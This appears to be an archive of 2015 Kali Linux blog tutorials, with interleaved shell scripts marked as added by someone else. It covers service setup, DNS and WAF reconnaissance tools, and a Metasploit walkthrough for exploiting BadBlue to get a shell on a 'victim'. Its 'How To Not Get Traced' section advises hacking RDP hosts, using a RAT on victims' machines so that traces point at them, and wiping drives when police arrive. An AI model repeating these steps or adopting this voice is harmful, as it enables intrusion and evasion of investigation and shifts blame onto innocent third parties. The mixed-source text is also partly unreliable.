Sunday, 14 June 2015

Managing Kali Linux Services

Kali Linux is a specialized Linux distribution aimed at security professionals. As such, it contains several non-standard features. The default Kali installation ships with several services preinstalled, such as SSH, HTTP, MySQL, etc. If left untouched, these services would load at boot time, which would result in Kali Linux exposing several open ports by default, something we want to avoid, for security reasons. Kali deals with this issue by configuring these network services not to start at boot time: they stay installed, but each one has to be started by hand, and explicitly enabled if you want it back after a reboot.
   
     The following module will discuss some of these services, as well as how to operate and manage them.

Default root Password:- 

         If you installed Kali from an image file, the installation process should have prompted you for a root password. If you are using the Kali Linux VMware image, as recommended, the default root password is "toor". Make sure to change any default or weak passwords to something long, complex, and secure before starting any services such as SSH: a network-reachable sshd with the well-known root password is trivial to log into. The root password can be changed with the passwd command (run it as root and enter the new password twice).




SSH Service:- 

           The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, start it with the service command from a Kali terminal.
       We can verify that the SSH service is running and listening on TCP port 22 by running netstat and piping its output into grep to search for sshd; the line to look for shows a LISTEN state on port 22 with sshd as the owning program.



          If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it explicitly with the update-rc.d script. The update-rc.d script can be used to enable and disable most services within Kali Linux. Do this only on a box whose root password has been changed: an enabled sshd with the default credentials is an open door from the moment the machine boots.



HTTP Service:-

          The HTTP service can come in handy during a penetration test, either for hosting a site or for providing a platform from which a victim machine can download files. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP service in Kali, start it with the service command from a terminal, just as with SSH.




             As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again, this time searching for the web server's process name.



             To have the HTTP service start at boot time, much like with the SSH service, you need to explicitly enable it with update-rc.d.
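The start / verify / enable-at-boot workflow described above, written out as an added example (this is not code from the original post or from Kali itself). It assumes the service and update-rc.d commands of the sysvinit-era Kali the post describes, and the netstat output it parses is constructed here so the listener checks can be run offline; the live functions at the bottom only make sense on the Kali host.

```sh
#!/bin/sh
# Added example, not from the original post: the start / verify / enable-at-boot
# workflow for a Kali 1.x (sysvinit) service as shell functions, plus an offline
# check that reads `netstat -antp` style output and reports which program sits
# behind a port and which listeners are reachable from outside the box.
# Assumptions: the `service` and `update-rc.d` commands of Kali 1.x; the
# netstat output below is constructed for this example, not captured from a host.

SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1456/mysqld
tcp6       0      0 :::80                   :::*                    LISTEN      1789/apache2'

# listening_program PORT NETSTAT_OUTPUT
# Prints the program name behind the LISTEN socket on PORT; exit 1 if nothing listens there.
listening_program() {
    printf '%s\n' "$2" | awk -v p="$1" '
        $6 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)          # "0.0.0.0:22" -> "22", ":::80" -> "80"
            prog = $7; sub(/^[0-9]+\//, "", prog)    # "1234/sshd" -> "sshd"
            if (port == p) { print prog; found = 1 }
        }
        END { exit (found ? 0 : 1) }'
}

# exposed_listeners NETSTAT_OUTPUT
# Prints "PORT PROGRAM" for every LISTEN socket bound to all interfaces (0.0.0.0 or ::).
# Services bound to loopback only, like MySQL on 127.0.0.1 above, are not listed:
# they are not reachable from the network, which is the exposure the post warns about.
exposed_listeners() {
    printf '%s\n' "$1" | awk '
        $6 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)
            host = substr($4, 1, length($4) - length(port) - 1)
            prog = $7; sub(/^[0-9]+\//, "", prog)
            if (host == "0.0.0.0" || host == "::") print port, prog
        }'
}

# start_and_verify SERVICE PORT: live use on the Kali box (needs root and netstat).
start_and_verify() {
    service "$1" start
    if listening_program "$2" "$(netstat -antp 2>/dev/null)" >/dev/null; then
        echo "$1 is listening on tcp/$2"
    else
        echo "$1 is NOT listening on tcp/$2" >&2
        return 1
    fi
}

# enable_at_boot SERVICE: opt in explicitly; Kali ships with network services disabled at boot.
enable_at_boot() {
    update-rc.d "$1" enable
}

# A typical session on the Kali host (left commented so sourcing this file has no side effects):
#   passwd                       # replace the default "toor" before anything listens
#   start_and_verify ssh 22
#   enable_at_boot ssh
#   start_and_verify apache2 80
#   enable_at_boot apache2
#   exposed_listeners "$(netstat -antp 2>/dev/null)"
```

The exposed_listeners check is the one worth running after every service you enable: it answers the question the post opens with (which ports does this box offer to the network) rather than only whether one daemon came up.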




Saturday, 13 June 2015

How to Hack Windows 7 using the BadBlue exploit

Introduction to BadBlue :-


                        BadBlue is a small Windows web server used for file sharing, and many organizations have used it for exactly that.
How can an attacker take advantage of it? Let's see.


 Steps:-

1. Start the Metasploit framework by typing "msfconsole" in a terminal.



2. Type "search badblue" at the msf prompt and hit enter; this lists the modules that target BadBlue.


3.    Now type "use exploit/windows/http/badblue_passthru" and hit enter. This module exploits a buffer overflow in the PassThru handling of BadBlue 2.72b, so it only works against that vulnerable version.


4.  Type "show options" to see which options the module needs. RHOST is required; RPORT defaults to 80, so change it if BadBlue listens on another port.

5.  Type "set rhost <ip_address of victim>" and hit enter.

6.  Finally, type "exploit" to attack the victim remotely.


7.    When you get a meterpreter session you are on the victim's system. Type "sysinfo" to see information about the victim, and "shell" to interact with the victim's cmd.
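A pre-flight check for the procedure above, added here as an example (not part of the original post, and not the Metasploit module's own code): before pointing badblue_passthru at an address, read the target's HTTP Server header and confirm it actually answers as BadBlue, since a buffer-overflow exploit thrown at the wrong web server gains nothing and may crash it. It assumes BadBlue announces itself as "Server: BadBlue/<version>" (the exact version string is whatever the target reports), that nc is available for the live banner grab, and the two sample responses are constructed, not captured.

```sh
#!/bin/sh
# Added example, not part of the original post: a pre-flight check for step 5
# above. Before pointing exploit/windows/http/badblue_passthru at a host, read
# the HTTP Server header and confirm the target really answers as BadBlue.
# Assumptions: BadBlue announces itself as "Server: BadBlue/<version>" (the
# version string is whatever the target reports); nc is available for the live
# banner grab; the two responses below are constructed for this example.

# server_header RESPONSE -> value of the Server: header (empty if absent)
server_header() {
    printf '%s\n' "$1" | tr -d '\r' | sed '/^$/q' | sed -n 's/^[Ss][Ee][Rr][Vv][Ee][Rr]:[[:space:]]*//p' | head -n 1
}

# is_badblue RESPONSE -> exit 0 only when the Server header starts with "BadBlue"
is_badblue() {
    case "$(server_header "$1")" in
        BadBlue*) return 0 ;;
        *)        return 1 ;;
    esac
}

# live_banner HOST [PORT] -> raw response to a HEAD request (live use; not run offline)
live_banner() {
    printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1" | nc -w 3 "$1" "${2:-80}"
}

# Constructed sample responses (header format assumed):
BADBLUE_RESP='HTTP/1.1 200 OK
Server: BadBlue/2.7
Content-Type: text/html

<html>...</html>'

OTHER_RESP='HTTP/1.1 200 OK
Server: Apache/2.2.22 (Debian)
Content-Type: text/html

<html>...</html>'

# Against a real target, only after the check passes (msfconsole assumed on PATH):
#   if is_badblue "$(live_banner 10.0.0.5)"; then
#       msfconsole -q -x "use exploit/windows/http/badblue_passthru; set RHOST 10.0.0.5; exploit"
#   fi
```

Header parsing stops at the first blank line on purpose: a page body that happens to contain the text "Server:" must not be mistaken for a banner.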


Friday, 5 June 2015

Load Balancing Detector (lbd) in Kali Linux

Introduction


Load Balancing Detector (lbd) is a tool that checks whether a given domain uses load balancing. Pentesters and attackers use it to learn whether a site is served by a single host or by a pool of servers, which is a large part of whether it can be knocked over by a denial-of-service attack.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it :-

Open lbd through Kali Linux >> Information Gathering >> IDS IPS Identification >> lbd



How to use it :-


·      To use it, run: lbd [domain] (the script itself is /usr/bin/lbd)
·      The tool first tests for DNS load balancing (several A records for the name, returned in rotating order) and then for HTTP load balancing (the Server and Date headers of repeated responses differing, which betrays more than one backend).
·      At the end it prints its verdict for each test.




Firewall Detection Tool Wafw00f in Kali Linux

Introduction

This is a Web Application Firewall Detection Tool.
The tool was written by Sandro Gauci and Wendel G. Henrique.

It will help you detect the WAF (Web Application Firewall) in front of a domain.
wafw00f can test for the firewalls in its built-in signature list (wafw00f -l prints it).
If a firewall from that list is detected, its name is displayed on screen.

How wafw00f detects a Web Application Firewall (WAF)
To detect a WAF it looks at the following things:
  • Cookies: many WAFs add a session cookie with a recognisable name
  • Server cloaking: the Server header is rewritten or removed
  • Response codes: a request carrying an attack string gets a different status than a clean one
  • Drop action: the connection is closed outright on malicious input
  • Pre-built rules: product-specific signatures in responses

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

With no arguments wafw00f prints its banner and usage.



How to use wafw00f

Example 1 :
Usage :
  wafw00f [target url]
Example :
  wafw00f www.***.com
Result : the output reports whether www.***.com is behind a Web Application Firewall and, where a signature matches, which product.
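The checks that lbd and wafw00f automate, as one added example covering both sections (this is not the tools' own code, nor from the original posts): lbd's DNS test looks for several A records, its HTTP test compares the Server header of repeated responses to the same request (it does the same with Date, where skew between answers points to several clocks, that is, several backends); wafw00f-style detection looks for well-known WAF cookies and for a changed status code when the request carries an attack string. The dig output and responses are constructed so the functions can be exercised offline, and the cookie-to-product table is a small illustrative subset assumed for this example.

```sh
#!/bin/sh
# Added example, not from the original posts, serving both the lbd and the
# wafw00f sections: the checks those tools automate, redone as shell functions
# over captured data. The dig output and responses below are constructed, and
# the cookie-to-product table is an assumed, illustrative subset.

# header_value NAME RESPONSE -> first value of that header, case-insensitive; empty if absent
header_value() {
    printf '%s\n' "$2" | tr -d '\r' | sed '/^$/q' | grep -i "^$1:" | head -n 1 | sed 's/^[^:]*:[[:space:]]*//'
}

# status_code RESPONSE -> numeric status from the status line
status_code() {
    printf '%s\n' "$1" | head -n 1 | awk '{ print $2 }'
}

# --- lbd-style checks ---

# dns_balanced DIG_SHORT_OUTPUT -> exit 0 if `dig +short NAME A` returned more than one distinct address
dns_balanced() {
    n=$(printf '%s\n' "$1" | grep -E '^[0-9]+(\.[0-9]+){3}$' | sort -u | wc -l | tr -d ' ')
    [ "$n" -gt 1 ]
}

# http_balanced HEADER RESPONSE... -> exit 0 if HEADER differs between any two of the responses
http_balanced() {
    name="$1"; shift
    init=0; first=""
    for r in "$@"; do
        v=$(header_value "$name" "$r")
        if [ "$init" -eq 0 ]; then
            first="$v"; init=1
        elif [ "$v" != "$first" ]; then
            return 0
        fi
    done
    return 1
}

# --- wafw00f-style checks ---

# waf_from_cookies RESPONSE -> prints the product suggested by a Set-Cookie name; exit 1 if none matches
waf_from_cookies() {
    names=$(printf '%s\n' "$1" | tr -d '\r' | sed '/^$/q' | grep -i '^Set-Cookie:' | sed 's/^[^:]*:[[:space:]]*//; s/=.*//')
    for c in $names; do
        case "$c" in
            __cfduid|cf_clearance)      echo "Cloudflare";       return 0 ;;
            incap_ses_*|visid_incap_*)  echo "Incapsula";        return 0 ;;
            citrix_ns_id|ns_af)         echo "Citrix NetScaler"; return 0 ;;
            BIGipServer*|TS[0-9a-f]*)   echo "F5 BIG-IP";        return 0 ;;
        esac
    done
    return 1
}

# waf_blocks_attack CLEAN_RESPONSE ATTACK_RESPONSE -> exit 0 when the request carrying an
# attack string got a different status than the clean one (403/406 vs 200 is typical)
waf_blocks_attack() {
    [ "$(status_code "$1")" != "$(status_code "$2")" ]
}

# --- constructed sample data ---
SAMPLE_DIG='93.184.216.34
93.184.216.35
93.184.216.36'

RESP_A='HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 14 Jun 2015 10:00:01 GMT

<html>ok</html>'

RESP_B='HTTP/1.1 200 OK
Server: Apache/2.4.10
Date: Sun, 14 Jun 2015 10:00:02 GMT

<html>ok</html>'

RESP_WAF_CLEAN='HTTP/1.1 200 OK
Server: cloudflare-nginx
Set-Cookie: __cfduid=d1e2f3; path=/; HttpOnly

<html>ok</html>'

RESP_WAF_ATTACK='HTTP/1.1 403 Forbidden
Server: cloudflare-nginx

<html>blocked</html>'

# Live use, swapping the samples for real answers (not run here):
#   dns_balanced "$(dig +short www.example.com A)"
#   r1=$(curl -s -D - -o /dev/null http://www.example.com/); r2=$(curl -s -D - -o /dev/null http://www.example.com/)
#   http_balanced Server "$r1" "$r2"
#   waf_blocks_attack "$r1" "$(curl -s -D - -o /dev/null 'http://www.example.com/?q=<script>alert(1)</script>')"
```

A differing Server header across two answers is hard evidence of several backends; a 403 on the attack request alone is only a hint, since the application itself may reject the input, which is why wafw00f combines it with cookie and rule signatures before naming a product.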



Thursday, 4 June 2015

Useful Commands in Linux

A list of commonly needed commands on Debian/Ubuntu-derived systems (Kali included):

Command privileges.

    sudo command – run command as root
    sudo su – open a root shell
    sudo su user – open a shell as user
    sudo -k – forget cached sudo credentials (ask for the password again)
    gksudo command – graphical sudo dialog (GNOME)
    kdesudo command – graphical sudo dialog (KDE)
    sudo visudo – edit /etc/sudoers safely (syntax is checked before saving)
    gksudo nautilus – file manager as root (GNOME)
    kdesudo konqueror – file manager as root (KDE)
    passwd – change your password 

Command Network


    ifconfig – show network interface information
    iwconfig – show wireless interface information
    sudo iwlist scan – scan for wireless networks
    sudo /etc/init.d/networking restart – restart networking
    (file) /etc/network/interfaces – manual interface configuration
    ifup interface – bring an interface up
    ifdown interface – take an interface down 

Commands Display

    sudo /etc/init.d/gdm restart – restart X (GNOME)
    sudo /etc/init.d/kdm restart – restart X (KDE)
    (file) /etc/X11/xorg.conf – X display configuration
    sudo dpkg-reconfigure -phigh xserver-xorg – reset the X configuration
    Ctrl+Alt+Bksp – restart the X display if frozen
    Ctrl+Alt+FN – switch to tty N
    Ctrl+Alt+F7 – switch back to the X display 

Commands Service System.

    start service – start a service (Upstart)
    stop service – stop a service (Upstart)
    status service – check whether a service is running (Upstart)
    /etc/init.d/service start – start a service (SysV)
    /etc/init.d/service stop – stop a service (SysV)
    /etc/init.d/service status – check a service (SysV)
    /etc/init.d/service restart – restart a service (SysV)
    runlevel – show the current runlevel 

Commands for Firewall.

    ufw enable – turn on the firewall
    ufw disable – turn off the firewall
    ufw default allow – allow all incoming connections by default
    ufw default deny – drop all incoming connections by default
    ufw status – show status and current rules
    ufw allow port – allow traffic on port
    ufw deny port – block port
    ufw deny from ip – block ip 

Command System.


    lsb_release -a – get the version of Ubuntu
    uname -r – get kernel version
    uname -a – get all the information kernel 

Commands for Package Manager.


    apt-get update – refresh the list of available updates
    apt-get upgrade – update all packages
    apt-get dist-upgrade – upgrade the distribution (also handles changed dependencies)
    apt-get install pkg – install pkg
    apt-get remove pkg – uninstall pkg
    apt-get autoremove – remove packages that are no longer needed
    apt-get -f install – try to fix broken dependencies
    dpkg --configure -a – try to finish configuring broken packages
    dpkg -i pkg.deb – install the file pkg.deb
    (file) /etc/apt/sources.list – list of APT repositories 

Special Packages For commands.

    ubuntu-desktop – the standard Ubuntu desktop
    kubuntu-desktop – KDE desktop
    xubuntu-desktop – XFCE desktop
    ubuntu-minimal – core Ubuntu packages
    ubuntu-standard – the standard Ubuntu utilities
    ubuntu-restricted-extras – non-free but useful
    kubuntu-restricted-extras – ditto for KDE
    xubuntu-restricted-extras – ditto for XFCE
    build-essential – packages needed to compile software
    linux-image-generic – latest generic kernel image
    linux-headers-generic – latest kernel headers 

Applications commands.

    nautilus – File Manager (GNOME)
    dolphin – File Manager (KDE)
    konqueror – Web browser (KDE)
    kate – text editor (KDE)
    gedit – text editor (GNOME)

How To Not Get Traced


First you are going to want to know what you need, right?

VPN

PuTTY

Tor

RDP

Proxy

RAT

SMAC

TrueCrypt

Magnet


---------------------------------------------------------------------------

First you want to buy a VPN; free VPNs are usually poorly run and heavily monitored.
I suggest Private Internet Access as a good VPN;
they advertise no logs, an offshore location and private IPs.
If you want to save about $2, go ahead and buy nVPN.

These VPNs use the OpenVPN protocol, so you are going to
need the OpenVPN client.

You will need to be on the VPN whilst on Skype or you will be easily doxed, since Skype can expose your real IP.

---------------------------------------------------------------------------

PuTTY is essential for setting up an SSH tunnel through a VPS. If someone DDoSes your
VPN you can fall back to the SSH/VPS until your VPN comes back up.
SSH is also a good layer in your chain (more on that below).

---------------------------------------------------------------------------

Tor Browser is a browser designed to stop network surveillance.
A Tor circuit has three nodes, the entry (guard) node, the middle node and the exit node, which are good
layers in your chain.
Each node only knows its neighbours, so no single one sees both your IP and the destination, which is what reinforces your anonymity.

---------------------------------------------------------------------------

An RDP (Remote Desktop Protocol) box is a remote Windows desktop hosted on someone else's network; used as a jump host it plays a role
similar to a SOCKS5 proxy, since your traffic leaves from its IP. There are many free RDPs but some cost money.
You can easily hack RDPs. This is also a vital layer in your chain.

---------------------------------------------------------------------------

A proxy is similar to a VPN in that your traffic leaves from another IP, but a VPN tunnels all of the machine's
network traffic, while a proxy only carries the traffic of the applications configured to use it, and a plain HTTP or SOCKS proxy adds no encryption of its own.
You can chain as many proxies as you want by using a tool called 'Proxifier'.

I have my own project coming along called SkypeGhost, which is a Skype
configuration file that acts as a proxy of your choice. (Out soon!)

---------------------------------------------------------------------------

You will need a RAT for its reverse SOCKS5 feature; this makes your current
IP appear to be your victim's IP, so a dox or trace leads to them.
Most RATs have this feature. If you don't want to set up port forwarding you need
to use a PHP RAT.

---------------------------------------------------------------------------

SMAC is to your MAC address what a VPN is to your IP: it spoofs your
MAC address, making the machine harder to identify. Note that a MAC address never travels beyond the local network segment, so spoofing it only matters to whoever shares that segment (the Wi-Fi or LAN you connect from), not to anyone on the Internet. There are other alternatives
to SMAC but I think this is the best for me.

---------------------------------------------------------------------------

TrueCrypt is a tool for encrypting drives so that data at rest cannot be read without the passphrase;
you can choose which HDDs to encrypt as you go.

---------------------------------------------------------------------------

A magnet is kept for running over your HDD to destroy the drive if the police turn up.
In practice a hand magnet will not reliably erase a modern hard disk; full-disk encryption with a strong passphrase is what actually keeps the contents unreadable.

---------------------------------------------------------------------------

Your chain should look like this;

RDP >> VPS/SSH >> VPN >> Reverse SOCKS5 >> your proxy chain >> Tor entry node >> Tor middle node >> Tor exit node

Information Gathering With dnsrecon Kali Linux


DNSRecon is a DNS enumeration tool written in Python.
DNSRecon provides the ability to perform:
  • Check all NS records for zone transfers
  • Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  • Perform common SRV record enumeration
  • Top Level Domain (TLD) expansion
  • Check for wildcard resolution
  • Brute force subdomain and host A and AAAA records given a domain and a wordlist
  • Perform a PTR record lookup for a given IP range or CIDR
  • Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file
  • Enumerate common mDNS records in the local network
  • Enumerate hosts and subdomains using Google
So Lets begin:-
      
Open dnsrecon through Kali Linux >> Information Gathering >> DNS Analysis >> dnsrecon




For std, type: dnsrecon -t std -d youtube.com



For SRV, type: dnsrecon -t srv -d gmail.com



 For axfr, type: dnsrecon -t axfr -d saintangelos.com



 For tld, type: dnsrecon -t tld -d saintangelos.com



Enumerating DNS records with DNSenum Tool in Kali Linux

DNSenum is a multithreaded Perl script to enumerate the DNS information of a domain and to discover non-contiguous IP blocks.
OPERATIONS:
  • Get the host's address (A record).
  • Get the name servers (threaded).
  • Get the MX records (threaded).
  • Perform AXFR queries on the name servers and get the BIND version (threaded).
  • Get extra names and subdomains via Google scraping (Google query = "allinurl: -www site:domain").
  • Brute force subdomains from a file; can also recurse on subdomains that have NS records (all threaded).
  • Calculate class C network ranges and perform whois queries on them (threaded).
  • Perform reverse lookups on net ranges (class C and/or whois net ranges) (threaded).
  • Write IP blocks to the file domain_ips.txt.
Source: https://github.com/fwaeytens/dnsenum
DNS enumeration is the process of locating all DNS servers and DNS entries for an organization. It lets us gather critical information about the organization such as usernames, computer names, IP addresses, and so on. To achieve this task, we will use DNSenum

and enter the following command
root@Kali:~# dnsenum --enum example.com
It will show you the host address, the name server addresses, the mail (MX) servers and the zone transfer information.




Enumerate DNS Records using dnsdict6

                                            *INTRODUCTION*


If you want to gather information about a target’s DNS, you should probably use a tool like dnsdict6 to help you to enumerate many of the details which are not easily apparent for your average user or websurfer.
With dnsdict6 you find information such as:
·      Subdomain info
·      Enumerate all ipv4 and ipv6 addresses.
·      You can also enumerate details of srv records.
·      Also you can enumerate details of Name Server and Mail Exchanger records.
So, now we will jump into dnsdict6 on Kali Linux, your best option for a penetration testing distribution.

HOW TO OPEN DNSDICT6 ON KALI LINUX

To open dnsdict6 goto > Kali Linux > Information Gathering > DNS Analysis > dnsdict6
See the below image:



DNSDICT6 OPENED

Once you open dnsdict6, you will find various options on your screen.
A good pen tester will always read and understand all the options at his disposal.
So let's see what kind of options we have, and some examples:
  • -4 : also dump IPv4 addresses. Example: dnsdict6 -4 [domain]
  • -t [#] : number of threads; the default is 8 and the maximum is 32. Example: dnsdict6 -d -t 18 [domain]
  • -d : also display IPv6 information for the NS and MX records of the domain. Example: dnsdict6 -d [domain]
  • -S : also enumerate SRV service records. Example: dnsdict6 -S -t 21 [domain]
  • -[smlx] : choose the size of the built-in dictionary: -s small, -m medium (default), -l large, -x xtreme
For more information you can see the below image:


DNSDICT HELP OPTION

If you need help you can use the help option.
Command is :
dnsdict6 -h
See the result of this command in the below image:



EXAMPLE 1 : ENUMERATION WITH DEFAULT SETTINGS

This example shows the DNS entries found for a given domain.
Command is :
dnsdict6 google.com
When you run the command without options it uses the default number of threads (8) and the default dictionary size, -m (medium, 796 entries).
This run takes 1 to 2 minutes to complete.
See the below image:



This tool shows you big list of entries if you are enumerating a larger web domain, such as facebook, google, etc…

EXAMPLE 2: ENUMERATING DNS RECORDS

In this example, you will find the name server (NS) and mail exchange (MX) records.
To see the NS and MX records you have to use the "-d" option, as we have done in our example.
After running the command, it shows the DNS records of google.com with IPv4 addresses.
Why IPv4 addresses? Because we used the -4 option with the command, which dumps all the IPv4 addresses.
Remember: if we do not specify the threads and dictionary size, it takes the default threads (8) and dictionary size (medium).



EXAMPLE 3 : ENUMERATE  IPV4 IPV6, NAME SERVER, MAIL SERVER  WITH OPTIONS

This example is the same as above as far as enumerating NS and MX records goes, but the main difference is that we set the number of threads manually.
Command is :
dnsdict6 -d46 -t 32  google.com
This command displays the NS and MX records with their IPv4 and IPv6 addresses, using 32 threads. As written it still uses the default medium dictionary; add -x to brute force with the xtreme list, at the cost of a much longer run.
So try this example and you will be able to gather as much information as you can.




EXAMPLE 4 : ENUMERATE SRV SERVICE RECORDS

Finally, we will take a look at an SRV Record example.
First, we should understand what an SRV record actually is (according to Wikipedia):
A Service record (SRV record) is a specification of data in the Domain Name System defining the location, i.e. the hostname and port number, of servers for specified services.
It is defined in RFC 2782, and its type code is 33. Some Internet protocols such as the Session Initiation Protocol (SIP) and the Extensible Messaging and Presence Protocol (XMPP) often require SRV support by network elements.
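The core of what dnsrecon, dnsenum and dnsdict6 do in the three sections above (standard record lookups, a zone transfer attempt per name server, wildcard detection and wordlist brute force), as one added example written against dig; it is not the code of any of those tools or of the original posts. The answer parsing lives in small functions exercised here on constructed dig output, so the checks run offline; example.com, the sample answers and the wordlist path are assumptions for the example and stand for no real zone.

```sh
#!/bin/sh
# Added example, not from the original posts, for the dnsrecon, dnsenum and
# dnsdict6 sections: record lookups, zone transfer attempt, wildcard detection
# and wordlist brute force written against `dig`. Assumptions: dig from the
# dnsutils/bind-utils package for live use; example.com, the sample answers
# and the wordlist are made up for this example and stand for no real zone.

# answers_of DIG_OUTPUT TYPE -> RDATA of every answer of that type, one per line
# (for `dig +noall +answer` output: NAME TTL CLASS TYPE RDATA...)
answers_of() {
    printf '%s\n' "$1" | awk -v t="$2" '
        $3 == "IN" && $4 == t {
            out = $5
            for (i = 6; i <= NF; i++) out = out " " $i   # MX/SOA/TXT RDATA spans several fields
            print out
        }'
}

# has_records DIG_OUTPUT TYPE -> exit 0 if at least one answer of that type is present
has_records() {
    [ -n "$(answers_of "$1" "$2")" ]
}

# is_wildcard DIG_OUTPUT_FOR_RANDOM_LABEL -> exit 0 if a label that cannot exist still
# resolves; then every brute-forced guess "resolves" and the results are worthless
is_wildcard() {
    has_records "$1" A || has_records "$1" AAAA
}

# zone_transfer_open AXFR_OUTPUT -> exit 0 if `dig axfr` actually returned records
# (a refused transfer prints only ";"-prefixed comment lines such as "; Transfer failed.")
zone_transfer_open() {
    printf '%s\n' "$1" | grep -Eq '^[^;[:space:]].*[[:space:]]IN[[:space:]]'
}

# brute_hosts DOMAIN WORDLIST -> prints "name address" for each word that resolves (live; needs dig)
brute_hosts() {
    domain="$1"; wordlist="$2"
    probe="$(date +%s)$$-nonexistent.$domain"        # label nobody would have created
    if is_wildcard "$(dig +noall +answer "$probe" A)"; then
        echo "wildcard DNS on $domain: brute force results would be meaningless" >&2
        return 2
    fi
    while IFS= read -r w; do
        [ -n "$w" ] || continue
        for ip in $(answers_of "$(dig +noall +answer "$w.$domain" A)" A); do
            echo "$w.$domain $ip"
        done
    done < "$wordlist"
}

# enumerate DOMAIN -> the "std" pass of dnsrecon / dnsenum plus an AXFR attempt per name server (live)
enumerate() {
    for t in SOA NS MX A AAAA TXT; do
        dig +noall +answer "$1" "$t"
    done
    for ns in $(answers_of "$(dig +noall +answer "$1" NS)" NS); do
        if zone_transfer_open "$(dig axfr "$1" "@$ns")"; then
            echo "zone transfer allowed by $ns"
        fi
    done
}

# Constructed dig output for the offline checks:
SAMPLE_STD='example.com.   300 IN A    93.184.216.34
example.com.   300 IN AAAA 2606:2800:220:1:248:1893:25c8:1946
example.com.   300 IN MX   10 mail.example.com.
example.com.   300 IN NS   ns1.example.com.'

SAMPLE_WILDCARD='1434268800123-nonexistent.example.com. 300 IN A 93.184.216.34'

SAMPLE_AXFR_REFUSED='; <<>> DiG 9.9.5 <<>> axfr example.com @ns1.example.com
;; global options: +cmd
; Transfer failed.'

SAMPLE_AXFR_OPEN='example.com.       300 IN SOA ns1.example.com. hostmaster.example.com. 2015061401 3600 900 604800 300
www.example.com.   300 IN A   93.184.216.34
example.com.       300 IN SOA ns1.example.com. hostmaster.example.com. 2015061401 3600 900 604800 300'

# Live use (not run here):  enumerate example.com;  brute_hosts example.com /usr/share/dnsenum/dns.txt
```

The wildcard probe is the check worth keeping from this: all three tools brute force names from a dictionary, and against a zone with a wildcard A record every guess comes back positive, so the probe has to run first and the run aborted (or its answers filtered against the wildcard address) when it resolves.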





CONCLUSION:-

This tool is used for enumerating DNS records.
Now that you have the basics, you can try more on your own!
This tool will help you better understand the workings and compartmentalization of domains, as well as how the target business network is organized. This information is for educational and legal pen testing use. Do not do things that are evil and bad.